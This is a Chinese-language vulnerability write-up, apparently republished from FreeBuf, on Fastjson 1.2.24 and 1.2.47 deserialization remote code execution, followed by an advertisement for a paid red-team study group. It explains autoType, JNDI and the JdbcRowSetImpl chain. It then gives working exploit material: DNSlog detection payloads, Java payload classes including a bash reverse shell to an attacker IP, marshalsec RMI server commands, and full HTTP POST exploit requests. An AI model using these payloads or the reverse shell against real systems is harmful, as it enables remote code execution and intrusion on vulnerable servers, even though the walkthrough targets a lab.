本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

Fastjson1.2.24-RCE漏洞

漏洞简介

fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串，这样得到字符串之后就可以通过数据库等方式进行持久化了。

指纹特征

1. 1. 根据返回包判断 任意抓个包，提交方式改为POST，花括号不闭合。返回包在就会出现fastjson字样。当然这个可以屏蔽！

2. 2. 利用DNSlog盲打 构造以下payload，利用sdnslog平台接收。

{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}

1.2.67版本后payload

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
畸形：{"@type":"java.net.InetSocketAddress"{"address":,"val":"这里是dnslog"}}
POST / HTTP/1.1
Host: 192.168.72.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 71

{"YikJiang":{"@type":"java.net.Inet4Address","val":"pesy0e.dnslog.cn"}}

3. Java站并且传的数据是JSON格式的都可以尝试

4. Burp插件检测

漏洞原理

一、原理概述

fastjson在解析json的过程中，支持使用==autoType==来实例化某一个具体的类，==autoType==标注了类对应的原始类型，方便在反序列化的时候定位到具体类型，fastjson在对JSON字符串进行反序列化的时候，就会读取@type到内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链,造成远程代码执行。

因为有了==autoType功能，那么fastjson在对JSON字符串进行反序列化的时候，就会读取@type到内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。那 么就可以利用这个特性，自己构造一个JSON字符串，并且使用@type指定一个自己想要使用的攻击类库。==

在fastjson中我们使用JdbcRowSetImpl进行反序列化的攻击，我们给此类中的setDataSourcesName输入恶意内容（rmi链接），让目标服务在反序列化的时候，请求rmi服务器，执行rmi服务器下发的命令，从而导致远程命令执行漏洞

二、Fastjson

FastJson是alibaba的一款开源JSON解析库，可用于将Java对象转换为其JSON表示形式，也可以用于将JSON字符串转换为等效的Java对象。

三、AutoType

fastjson的主要功能就是将Java Bean序列化成JSON字符串，这样得到字符串之后就可以通过数据库等方式进行持久化了。但是，fastjson在序列化以及反序列化的过程中并没有使用Java自带的序列化机制，==而是自定义了一套机制。==

对于JSON框架来说，想要把一个Java对象转换成字符串，可以有两种选择：

1. 1. 1、基于属性

2. 2. 2、基于setter/getter

而我们所常用的JSON序列化框架中，FastJson和jackson在把对象序列化成json字符串的时候，是通过遍历出该类中的所有getter方法进行的。Gson并不是这么做的，他是通过反射遍历该类中的所有属性，并把其值序列化成json。我们对java类进行序列化的时候，fastjson会自动扫描其中的get方法，将里边的字段值序列化到JSON的字符串中，当类包含了一个接口或者抽象了的时候，使用fastjson进行序列化的时候就会将子类型抹去，只留下接口（抽象类）的类型，反序列化的时候就无法拿到原始的类型。

但是使用SerializerFeature.WriteClassName进行标记后，JSON字符串中多出了一个@type^[1]字段，标注了类对应的原始类型，方便在反序列化的时候定位到具体类型，这个就是AutoType，和引入AutoType的原因。

因为有了autoType功能，那么fastjson在对JSON字符串进行反序列化的时候，就会读取@type到内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。那 么就可以利用这个特性，自己构造一个JSON字符串，并且使用@type指定一个自己想要使用的攻击类库。

四、@type

@type是fastjson中的一个特殊注解，用于标识JSON字符串中的某个属性是一个Java对象的类型。具体来说，当fastjson从JSON字符串反序列化为Java对象时，如果JSON字符串中包含@type属性，fastjson会根据该属性的值来确定反序列化后的Java对象的类型。

五、 JNDI 注入

1、JNDI是什么

JNDI全称为Java命名和目录接口。我们可以理解为JNDI提供了两个服务，即命名服务和目录服务。

2、lookup函数

如果lookup参数可控的话，那么我们就可以传入恶意的url地址来控制受害者加载攻击者指定的恶意类。当我们指定一个恶意的URL地址之后，受害者在获取完这个远程对象之后，开始调用恶意方法。但是在RMI中，调用远程方法，最终的执行是服务端去执行。只是把最终的结果以序列化的形式传递给客户端，也就是这里所说的受害者。当然，如果受害者==内部存在漏洞组件存在反序列化漏洞==的话，我们可以==构造恶意的序列化对象，返回给客户端，当客户端在进行反序列化的时候，可以触发漏洞==；如果目标组件不存在反序列化漏洞，我们返回一个恶意对象，但是客户端本地没有这个class文件，当然也就不能成功获取到这个对象。

六、RMI

RMI（Remote Method Invocation）远程方法调用，是专为Java环境设计的远程方法调用机制，远程服务器实现具体的Java方法并提供接口，客户端本地仅需根据接口类的定义，提供相应的参数即可调用远程方法。

七、LDAP

LDAP是轻型目录访问协议的缩写，是一种用于访问和维护分层目录信息的协议。

八、JdbcRowSetImpl利用链

在fastjson中我们使用JdbcRowSetImpl进行反序列化的攻击，JdbcRowSetImpl利用链的重点就在怎么调用autoCommit的set方法，而fastjson反序列化的特点就是会自动调用到类的set方法，所以会存在这个反序列化的问题。只要制定了@type的类型，他就会自动调用对应的类来解析。

这样我们就可以构造我们的利用链。在`@type`的类型为`JdbcRowSetImpl`类型的时候，JdbcRowSetImpl类就会进行实例化，那么只要将`dataSourceName`传给`lookup`方法，就可以保证能够访问到远程的攻击服务器，再使用设置`autoCommit`属性对lookup进行触发就可以了。整个过程如下：
     通过设置`dataSourceName`将属性传参给`lookup`的方法—>设置`autoCommit`属性，利用`SetAutoCommit`函数触发connect函数—>触发`connect`函数下面`lookup`函数就会使用刚刚设置的`dataSourceName`参数，即可通过RMI访问到远程服务器，从而执行恶意指令。

exploit如下：

{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://192.168.17.39:9999/Exploit”,”autoCommit”:true}

值得注意的是：1、dataSourceName需要放在autoCommit的前面，因为反序列化的时候是按先后顺序来set属性的，需要先etDataSourceName，然后再setAutoCommit。2、rmi的url后面跟上要获取的我们远程factory类名，因为在lookup()里面会提取路径下的名字作为要获取的类。

九、触发流程图

漏洞复现

1、访问靶机

靶机运行后，访问http://you-ip:8090 即可看到JSON格式的输出

2、攻击环节

a.首先我们构造一个YikJiang.java命令执行荷载，上传VPS并编译

// javac YikJiang.java
import java.lang.Runtime;
import java.lang.Process;
 
public class YikJiang {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/YikJiang0916"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

b.终端进行编译

注意要使用java1.8版本，高版本的jdk 版本把远程调用修复了，因为这个搞了半天

javac .YikJiang.java

c.编译完成后，会发现当前目录下生成了YikJiang.class文件

d.利用python启动临时的http服务，端口为8888

python.exe -m http.server 8888

e. 利用marshalsec工具（需要maven环境编译），或者使用工具marshalsec-0.0.3-SNAPSHOT-all.jar

f.生成payload

启动RMI服务器，监听8888端口，并指定加载远程类YikJiang.class

java -cp .marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.161:8888/#YikJiang" 777

g.修改提交模式和Content-Type为application/json，发送payload

POST / HTTP/1.1
Host: 192.168.72.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 161

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.161:777/YikJiang",
        "autoCommit":true
    }
}

3、攻击结果

进入doker容器docker exec -it 6549e687ad97 /bin/bash

Fastjson1.2.47-RCE漏洞

漏洞简介

fastjson 于1.2.24 版本后增加了反序列化白名单。而在2019年6月，fastjson 又被爆出在fastjson< =1.2.47的版本中，攻击者可以利用特殊构造的 json 字符串绕过白名单检测，成功执行任意命令

漏洞复现

在1.2.24版本漏洞复现中，我们利用fastjson漏洞进行了命令执行，1.2.27中，我们就尝试反弹shell（其实原理都相同）

1、访问靶机

靶机运行后，访问http://you-ip:8090 即可看到JSON格式的输出

2、攻击环节

a.我们构造反弹Shell

构造反弹shell的方式有很多种，这里用Hack-Tools插件进行构造

bash -i >& /dev/tcp/192.168.1.161/6666 0>&1

b.首先我们构造一个YikJiang.java命令执行荷载，上传VPS并编译

import java.lang.Runtime;
import java.lang.Process;
 
public class YikJiang {
 static {
      try {
             Runtime r = Runtime.getRuntime();
             Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.161/6666 0>&1"});
             p.waitFor();
       } catch (Exception e) {
           // do nothing
       }
   }
}

b.终端进行编译

注意要使用java1.8版本，高版本的jdk 版本把远程调用修复了，因为这个搞了半天

javac .YikJiang.java

c.编译完成后，会发现当前目录下生成了YikJiang.class文件

d.利用python启动临时的http服务，端口为8888

Python2.0python2 -m SimpleHTTPServer 8888

Python3.0python3 -m http.server 8888

python.exe -m http.server 8888

e. 利用marshalsec工具（需要maven环境编译），或者使用工具marshalsec-0.0.3-SNAPSHOT-all.jar

f.生成payload

启动RMI服务器，并指定加载远程类YikJiang.class

java -cp .marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.161:8888/#YikJiang" 9999

g.本地开启监听nc -lvp 6666

h.修改提交模式和Content-Type为application/json，发送payload

POST / HTTP/1.1
Host: 192.168.72.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 287

{
 
    "a":{
 
        "@type":"java.lang.Class",
 
        "val":"com.sun.rowset.JdbcRowSetImpl"
 
    },
 
    "b":{
 
        "@type":"com.sun.rowset.JdbcRowSetImpl",
 
        "dataSourceName":"rmi://192.168.1.161:9999/YikJiang",
 
        "autoCommit":true
 
 }

3、攻击结果

发送成功后，RMI服务器记录了请求信息，并且成功反弹Shell

本文作者：YikJiang，原文地址FreeBuf.COM^[2]

引用链接

[1] @type: https://github.com/type
[2] FreeBuf.COM: https://www.freebuf.com/

致力于红蓝对抗，实战攻防，星球不定时更新内外网攻防渗透技巧，以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。

涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 300+ 安全资源，针对网络安全成员的普遍水平，并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。

由于本人在入门阶段没有人带，也不想花钱报班，完全靠自己摸索，走了很多弯路，浪费了很多时间。所以建此圈子来引导一下半入门或者刚入门或者想系统的梳理一下自己知识体系的师傅们，提供以下内容：

      1、每周发布学习任务，由浅入深，从常见的漏洞原理、利用，到WAF绕过、钓鱼与免杀，再到Linux/Windows内网、域渗透、云安全，层层递进。会发布相应的参考资料，成员自行学习实践，并会根据每周任务选取1-3位完成优秀的成员，返还入圈费用。

      2、日常分享优质学习资源与攻防渗透技巧，包括但不限于渗透tips、教程、手册、学习路线等。

       3、一个学习氛围浓厚的社区，遇到问题可以快速提问、交流讨论，共同学习。

关注福利：

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理，收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“资料" 获取 网络安全、渗透测试相关资料文档